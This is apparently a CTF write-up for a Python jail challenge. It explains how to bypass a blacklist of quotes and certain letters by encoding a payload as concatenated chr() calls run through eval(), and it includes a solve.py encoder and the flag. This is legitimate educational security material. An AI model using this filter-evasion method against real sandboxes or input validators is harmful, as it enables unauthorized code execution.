Level 3

Challenge details

Solution

Below shows the source code of the challenge. A quick glimpse told us that this time, the restrictions are those characters and symbols listed in the line filter_set = set('"\'`ib') . Well, this means that directly parsing import() and breakpoint() are out of the solution list, and string concatenation will not work due to " being banned too.

As you can see in the figure below, I tried to input different payloads that I could think of. But none of them worked.

I utilized the linecache module as well, thinking that it already has the OS module imported so that I could avoid using the import() keyword. But yeah, I realized that it contains i and " too after sending over the line 😂. At this point I was just poking around with random commands and functions.

And then something came into my mind. How about printing the payload using different representations? Hey, it works!

Here's an ASCII table for your reference. For instance, we can print out letter b by telling Python its decimal representation, which is 98 in this case. This way, we're not triggering the banned keywords.

Converting the entire payload character by character is too much of work, therefore a script is created to automated this process and make my life easier (especially during midnight, I was damn sleepy 🥲).

solve.py
def ascii_to_decimal_string(input_string):
    decimal_values = [ord(char) for char in input_string]
    output_string = '+'.join([f"chr({value})" for value in decimal_values])
    return output_string

def main():
    # Get user input
    input_string = input("Enter an ASCII string: ")

    # Convert ASCII to decimal string representation
    output_string = ascii_to_decimal_string(input_string)

    # Display the result
    print("Output string:", output_string)

if __name__ == "__main__":
    main()

Let's do some PoC to test the script. Run the script and input the plain text code that we wanted to convert. Ayeee, those are the output that I was expecting.

Wrapping the payload with eval() function and send it over to the server showed that our PoC is working like a charm.

Now the final step, convert the real payload with the script.

Wrap the string in eval() function and we'll receive the flag.

Flag

GCTF2023{Lev3l_thr33_Y0u_ar3_insan3}

PreviousLevel 2NextLevel 4

Last updated